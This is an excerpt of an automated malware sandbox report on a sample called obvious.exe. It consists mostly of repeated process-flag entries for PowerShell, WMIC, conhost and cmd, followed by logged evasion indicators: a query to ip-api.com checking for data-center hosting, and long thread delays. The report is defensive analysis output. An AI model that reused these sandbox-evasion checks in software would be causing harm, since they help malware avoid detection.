                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\obvious.exeMemory allocated: 12F5F800000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeMemory allocated: 12F79220000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597281Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597172Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597047Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596937Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596717Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596500Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596362Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596125Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596016Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595796Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595687Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595575Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595467Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595063Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594922Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594813Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594688Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594578Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594469Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594344Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594125Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594013Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593797Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593684Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593578Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593469Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593344Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593123Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593014Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592797Jump to behavior
